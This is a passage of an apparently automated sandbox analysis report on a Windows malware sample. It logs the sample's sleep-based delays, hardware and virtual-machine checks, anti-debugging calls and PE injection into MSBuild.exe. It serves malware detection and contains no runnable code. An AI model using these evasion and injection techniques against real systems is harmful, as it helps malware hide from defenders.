                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2208Thread sleep time: -99656s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2208Thread sleep time: -99546s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2208Thread sleep time: -99416s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2208Thread sleep time: -99307s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2208Thread sleep time: -99184s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2208Thread sleep time: -99077s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2208Thread sleep time: -98968s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2208Thread sleep time: -98858s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2208Thread sleep time: -98741s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2208Thread sleep time: -98618s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2208Thread sleep time: -98515s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2208Thread sleep time: -98405s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2208Thread sleep time: -98279s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2208Thread sleep time: -98166s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2208Thread sleep time: -98050s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2208Thread sleep time: -97937s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2208Thread sleep time: -97828s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2208Thread sleep time: -97714s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2208Thread sleep time: -97608s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5592Thread sleep count: 418 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2208Thread sleep time: -97499s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2208Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeThread delayed: delay time: 100000Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeThread delayed: delay time: 99875Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeThread delayed: delay time: 99765Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeThread delayed: delay time: 99653Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeThread delayed: delay time: 99546Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeThread delayed: delay time: 99437Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeThread delayed: delay time: 99328Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeThread delayed: delay time: 99218Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeThread delayed: delay time: 99062Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeThread delayed: delay time: 98948Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeThread delayed: delay time: 98830Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeThread delayed: delay time: 98703Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeThread delayed: delay time: 98562Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeThread delayed: delay time: 98372Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeThread delayed: delay time: 98250Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeThread delayed: delay time: 98093Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeThread delayed: delay time: 97967Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeThread delayed: delay time: 97858Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeThread delayed: delay time: 97749Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 100000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99875Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99764Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99546Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99416Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99307Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99184Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99077Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98968Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98858Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98741Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98618Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98515Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98405Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98279Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98166Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98050Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97937Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97828Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97714Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97608Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97499Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: Amcache.hve.5.drBinary or memory string: VMware
                  Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe, 00000000.00000002.3241546046.000001CD87AE5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP>
                  Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: MSBuild.exe, 00000002.00000002.3011336947.0000000006200000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: Amcache.hve.5.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.5.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                  Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
                  Source: MSBuild.exe, 00000002.00000002.3006802921.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: vmware
                  Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.5.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.LOG1.5.dr, Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.LOG1.5.dr, Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: MSBuild.exe, 00000002.00000002.3006802921.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: VMwareVBox
                  Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  barindex
                  Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_02DD70A8 CheckRemoteDebuggerPresent,2_2_02DD70A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43E000Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 440000Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: EA2008Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exeJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
